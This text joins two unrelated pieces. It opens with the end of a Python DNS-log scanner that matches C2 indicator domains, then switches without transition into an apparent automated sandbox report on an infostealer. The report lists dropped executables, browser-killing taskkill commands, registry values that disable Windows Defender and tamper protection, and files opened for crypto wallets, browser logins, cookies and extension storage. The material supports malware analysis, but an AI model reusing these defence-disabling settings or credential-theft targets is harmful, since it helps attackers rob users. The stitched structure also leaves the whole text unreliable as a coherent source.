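    """Return one hit record per query that resolves to a known C2 domain."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, _qtype, qname = parts
        ioc = matches_ioc(qname, iocs)
        if ioc:
            hits.append({"ts": ts, "client": client, "qname": normalize(qname), "ioc": ioc})
    return hits


if __name__ == "__main__":
    c2 = extract_domains(REPORT_LINES)
    for hit in scan_dns_log(SAMPLE_DNS_LOG, c2):
        print(f"{hit['ts']} {hit['client']} queried {hit['qname']} (IOC {hit['ioc']})")
```

The same `matches_ioc` logic carries over to proxy or TLS SNI logs; the important property is that the comparison is on whole labels, because registrable-domain IOCs are routinely contacted through subdomains and defanged or upper-cased in the telemetry.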
Source: C:\Users\user\AppData\Local\Temp\G4X9C8XP66LPZY0PX2HHB5N.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe "C:\Users\user~1\AppData\Local\Temp\1001090001\8138ba21a1.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe "C:\Users\user~1\AppData\Local\Temp\1001091001\bd214fbd32.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe "C:\Users\user~1\AppData\Local\Temp\1001092001\136916b3ff.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1001093001\num.exe "C:\Users\user~1\AppData\Local\Temp\1001093001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe Process created: C:\Windows\SysWOW64\taskkill.exe
Source: 136916b3ff.exe, 0000000F.00000002.1996242810.0000000000A12000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 3BW8PCDTI0L77ZRRJ1.exe, 00000006.00000002.1780337753.00000000005E8000.00000040.00000001.01000000.0000000A.sdmp, 8138ba21a1.exe, 0000000A.00000002.1813757219.0000000000647000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Program Manager
Source: skotes.exe, skotes.exe, 00000009.00000002.1770858812.00000000007AA000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: O.Program Manager
Source: J2IWSCR5FJAMGGW2VC4ET4.exe, J2IWSCR5FJAMGGW2VC4ET4.exe, 00000004.00000002.1688949555.0000000000865000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: RProgram Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\J2IWSCR5FJAMGGW2VC4ET4.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001092001\136916b3ff.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001093001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001093001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001091001\bd214fbd32.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\3BW8PCDTI0L77ZRRJ1.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: file.exe, 00000000.00000003.1492941083.000000000598E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1498095593.000000000120B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1573396537.000000000598E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1504577527.000000000598E000.00000004.00000800.00020000.00000000.sdmp, 8138ba21a1.exe, 00000012.00000003.2116513162.00000000011B4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 39.2.5VHE3T5UQF0Q17ZEPUURN3ZOS.exe.f80000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.skotes.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.G4X9C8XP66LPZY0PX2HHB5N.exe.590000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000002.1769530723.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2252074672.0000000000F81000.00000040.00000001.01000000.0000001C.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.1589647149.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1688666080.00000000005C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.2208281116.0000000005340000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1647906928.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1646501442.0000000004CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.1635679717.0000000000591000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.1729250008.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 136916b3ff.exe PID: 5936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 7412, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8138ba21a1.exe PID: 2276, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 38.2.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.bd214fbd32.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.bd214fbd32.exe.50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.0.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.H8LKYZRGA2T6H9I76LLUOB7IB07Z.exe.290000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.0.num.exe.360000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.J2IWSCR5FJAMGGW2VC4ET4.exe.470000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000003.2232897578.0000000004D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2122542040.0000000000E1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2204680334.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1985396722.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.2323652564.0000000000291000.00000040.00000001.01000000.0000001D.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.2029327781.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.1883606041.0000000004A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1600676886.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2207625905.0000000000F87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1688670034.0000000000471000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1690398993.000000000111E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000000.2182412308.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1987795463.000000000112E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1927559885.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.1970036309.0000000000361000.00000080.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1923946896.0000000000051000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2116759682.0000000000051000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: J2IWSCR5FJAMGGW2VC4ET4.exe PID: 7932, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: bd214fbd32.exe PID: 4864, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001093001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe, 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: file.exe, 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\ElectronCash\wallets!
Source: file.exe String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 8138ba21a1.exe, 00000012.00000003.2084529738.0000000001193000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: file.exe String found in binary or memory: ExodusWeb3
Source: file.exe, 00000000.00000003.1431421560.00000000011F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1001090001\8138ba21a1.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
